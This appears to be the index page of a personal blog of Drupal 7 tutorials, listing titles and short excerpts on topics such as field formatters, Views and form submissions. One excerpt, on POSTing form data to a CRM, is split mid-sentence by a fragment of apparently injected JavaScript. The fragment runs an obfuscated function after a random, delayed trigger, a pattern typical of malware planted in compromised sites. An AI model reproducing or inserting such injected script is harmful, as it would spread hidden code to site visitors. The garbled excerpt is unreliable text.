Robert Kent


Personal blog of Robert Kent

Drupal 7: Adding autocomplete to search fields


Drupal 7: Creating a custom field formatter

A quick guide to how you can output your content fields any way you like without hacking theme files.


Drupal: Custom simple admin area


Custom user permissions in Drupal 7


Drupal: Keep destination parameter between user login and register


Drupal: Send custom form submission by POST

Sometimes in addition to having a site form log submissions to the database andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and send emails we want to POST the data remotely. For example, sending a form submission to a CRM like SalesForce.


Drupal: Creating a View of files associated with the current node


Drupal: Custom ordering of Views with drag and drop

Views in Drupal 7 are a great way of displaying lists of content such as news articles, blog posts or image galleries. By default Views comes with a lot of useful ways to sort these lists: alphabetically by title, chronologically by post date, e.t.c but sometimes there are cases where the order items are displayed in is arbitrary and a … Read More


Sending HTML emails with Drupal


Drupal: Creating a Related/Similar View block with Taxonomy